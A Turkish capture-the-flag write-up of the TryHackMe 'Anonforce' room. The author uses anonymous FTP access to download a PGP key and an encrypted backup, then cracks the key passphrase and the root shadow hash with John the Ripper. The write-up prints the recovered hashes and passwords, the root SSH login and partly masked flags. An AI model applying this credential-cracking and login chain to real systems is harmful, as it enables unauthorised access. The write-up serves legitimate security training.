Merhaba arkadaşlar, bugün TryHackMe platformu üzerinde bulunan Anonforce odasını çözeceğiz. İlk başta terminalimizden vpn konfigürasyon dosyamız ile bağlantımızı sağlayıp makinemizi başlattık. İP Adresini gelmesini bekliyoruz, geldikten sonra nmap taraması ile başlayacağız.
nmap -sC -sV -p- <ip_adres>
Komutu ile taramamızı başlatıyoruz.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096Aug 11 2019bin
| drwxr-xr-x 3 0 0 4096Aug 11 2019boot
| drwxr-xr-x 17 0 0 3700Jan 31 01:49 dev
| drwxr-xr-x 85 0 0 4096Aug 13 2019etc
| drwxr-xr-x 3 0 0 4096Aug 11 2019home
| lrwxrwxrwx 1 0 0 33 Aug 11 2019initrd.img -> boot/initrd.img-4.4.0-157-generic
| lrwxrwxrwx 1 0 0 33 Aug 11 2019initrd.img.old -> boot/initrd.img-4.4.0-142-generic
| drwxr-xr-x 19 0 0 4096Aug 11 2019lib
| drwxr-xr-x 2 0 0 4096Aug 11 2019lib64
| drwx------ 2 0 0 16384 Aug 11 2019lost+found
| drwxr-xr-x 4 0 0 4096Aug 11 2019media
| drwxr-xr-x 2 0 0 4096Feb 26 2019mnt
| drwxrwxrwx 2 100010004096Aug 11 2019notread [NSE: writeable]
| drwxr-xr-x 2 0 0 4096Aug 11 2019opt
| dr-xr-xr-x 96 0 0 0 Jan 31 01:49 proc
| drwx------ 3 0 0 4096Aug 11 2019root
| drwxr-xr-x 18 0 0 540 Jan 31 01:49 run
| drwxr-xr-x 2 0 0 12288 Aug 11 2019sbin
| drwxr-xr-x 3 0 0 4096Aug 11 2019srv
| dr-xr-xr-x 13 0 0 0 Jan 31 01:49 sys
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.174.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 20488a:f9:48:3e:11:a1:aa:fc:b7:86:71:d0:2a:f6:24:e7 (RSA)
| 256 73:5d:de:9a:88:6e:64:7a:e1:87:ec:65:ae:11:93:e3 (ECDSA)
|_ 256 56:f9:9f:24:f1:52:fc:16:b7:7b:a3:e2:4f:17:b4:ea (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.09 seconds
Evet burada gördüğümüz gibi ftp üzerinden anonymous giriş var şimdi giriş yapalım.
┌──(kali㉿kali)-[~]
└─$ ftp 10.82.164.133
Connected to 10.82.164.133.
220 (vsFTPd 3.0.3)
Name (10.82.164.133:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||31102|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096Aug 11 2019bin
drwxr-xr-x 3 0 0 4096Aug 11 2019boot
drwxr-xr-x 17 0 0 3700Jan 31 01:49 dev
drwxr-xr-x 85 0 0 4096Aug 13 2019etc
drwxr-xr-x 3 0 0 4096Aug 11 2019home
lrwxrwxrwx 1 0 0 33 Aug 11 2019initrd.img -> boot/initrd.img-4.4.0-157-generic
lrwxrwxrwx 1 0 0 33 Aug 11 2019initrd.img.old -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 19 0 0 4096Aug 11 2019lib
drwxr-xr-x 2 0 0 4096Aug 11 2019lib64
drwx------ 2 0 0 16384 Aug 11 2019lost+found
drwxr-xr-x 4 0 0 4096Aug 11 2019media
drwxr-xr-x 2 0 0 4096Feb 26 2019mnt
drwxrwxrwx 2 100010004096Aug 11 2019notread
drwxr-xr-x 2 0 0 4096Aug 11 2019opt
dr-xr-xr-x 85 0 0 0 Jan 31 01:49 proc
drwx------ 3 0 0 4096Aug 11 2019root
drwxr-xr-x 18 0 0 540 Jan 31 01:49 run
drwxr-xr-x 2 0 0 12288 Aug 11 2019sbin
drwxr-xr-x 3 0 0 4096Aug 11 2019srv
dr-xr-xr-x 13 0 0 0 Jan 31 01:49 sys
drwxrwxrwt 9 0 0 4096Jan 31 01:49 tmp
drwxr-xr-x 10 0 0 4096Aug 11 2019usr
drwxr-xr-x 11 0 0 4096Aug 11 2019var
lrwxrwxrwx 1 0 0 30 Aug 11 2019vmlinuz -> boot/vmlinuz-4.4.0-157-generic
lrwxrwxrwx 1 0 0 30 Aug 11 2019vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic
226 Directory send OK.
ftp>
İçeriye girişimizi sağladık. Burada notread adında bir klasörü var ilgi çekici görünüyor, içeri giriyoruz.
ftp> cd notread
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||30584|)
150 Here comes the directory listing.
-rwxrwxrwx 1 10001000524 Aug 11 2019backup.pgp
-rwxrwxrwx 1 100010003762Aug 11 2019private.asc
226 Directory send OK.
ftp>
Bu dosyaları şimdi ana bilgisayarımıza çekeceğiz.
ftp> get backup.pgp
local: backup.pgp remote: backup.pgp
229 Entering Extended Passive Mode (|||31895|)
150 Opening BINARY mode data connection for backup.pgp (524 bytes).
100% |************************************************************************| 524 3.59 MiB/s 00:00 ETA
226 Transfer complete.
524 bytes received in 00:00 (7.57 KiB/s)
ftp> get private.asc
local: private.asc remote: private.asc
229 Entering Extended Passive Mode (|||9641|)
150 Opening BINARY mode data connection for private.asc (3762 bytes).
100% |************************************************************************| 3762 6.19 MiB/s 00:00 ETA
226 Transfer complete.
3762 bytes received in 00:00 (50.82 KiB/s)
ftp> exit
221 Goodbye.
Şimdi şifre kırma işlemi yapıcaz ve john kullanıcaz,
gpg2john private.asc > gpg_hash.txt
private.asc dosyasının hashini alıp john the ripper ile kırıcaz.
┌──(kali㉿kali)-[~]
└─$john --wordlist=/usr/share/wordlists/rockyou.txt gpg_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xbox360 (anonforce)
1g 0:00:00:00 DONE (2026-01-31 04:57) 20.00g/s 18600p/s 18600c/s 18600C/s xbox360..sheena
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
şifre xbox360 olarak çıktı.
┌──(kali㉿kali)-[~]
└─$ gpg --import private.asc
gpg: keybox '/home/kali/.gnupg/pubring.kbx' created
gpg: /home/kali/.gnupg/trustdb.gpg: trustdb created
gpg: key B92CD1F280AD82C2: public key "anonforce <melodias@anonforce.nsa>" imported
gpg: key B92CD1F280AD82C2: secret key imported
gpg: key B92CD1F280AD82C2: "anonforce <melodias@anonforce.nsa>" not changed
gpg: Total number processed: 2
gpg: imported: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
┌──(kali㉿kali)-[~]
└─$ gpg --decrypt backup.pgp
gpg: encrypted with elg512 key, ID AA6268D1E6612967, created 2019-08-12
"anonforce <melodias@anonforce.nsa>"
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18120:0:99999:7:::
uuidd:*:18120:0:99999:7:::
melodias:$1$xDhc6S6G$IQHUW5ZtMkBQ5pUMjEQtL1:18120:0:99999:7:::
sshd:*:18120:0:99999:7:::
ftp:*:18120:0:99999:7:::
┌──(kali㉿kali)-[~]
└─$
Bulduğumuz şifreyi import edip 2. dosyamızıda açtık, ekrana şifre sorduğu zaman xbox360 yazıp enterliyoruz. Ayrıca çıkarılan shadowslarda root bilgerinide görmüş olduk. Şimdi hedef.txt dosyası oluşturup içine root bilgisini atıyorum
nano hedef.txt
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0
john çalıştırıp kıracağız.
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hedef.txt
Warning: only loading hashes of type "sha512crypt", but also saw type "md5crypt"
Use the "--format=md5crypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hikari (root)
1g 0:00:00:01 DONE (2026-01-31 05:00) 0.6250g/s 4320p/s 4320c/s 4320C/s 98765432..better
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Buradan root kullanıcısınında şifresini bulmuş olduk.
┌──(kali㉿kali)-[~]
└─$ ssh root@10.82.164.133
The authenticity of host '10.82.164.133 (10.82.164.133)' can't be established.
ED25519 key fingerprint is: SHA256:+bhLW3R5qYI2SvPQsCWR9ewCoewWWvFfTVFQUAGr+ew
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.82.164.133' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
root@10.82.164.133's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ubuntu:~# ls
root.txt
root@ubuntu:~# cat root.txt
f706*******************
root@ubuntu:~#
Root flagi almış olduk ama user.txt’den önce aldık :)
root@ubuntu:~# cd /home
root@ubuntu:/home# ls
melodias
root@ubuntu:/home# cd melodias/
root@ubuntu:/home/melodias# ls
user.txt
root@ubuntu:/home/melodias# cat user.txt
60****************************
root@ubuntu:/home/melodias#
İçeri girip user.txt çekiyoruz.
BAŞARILI: Root yetkisi alındı.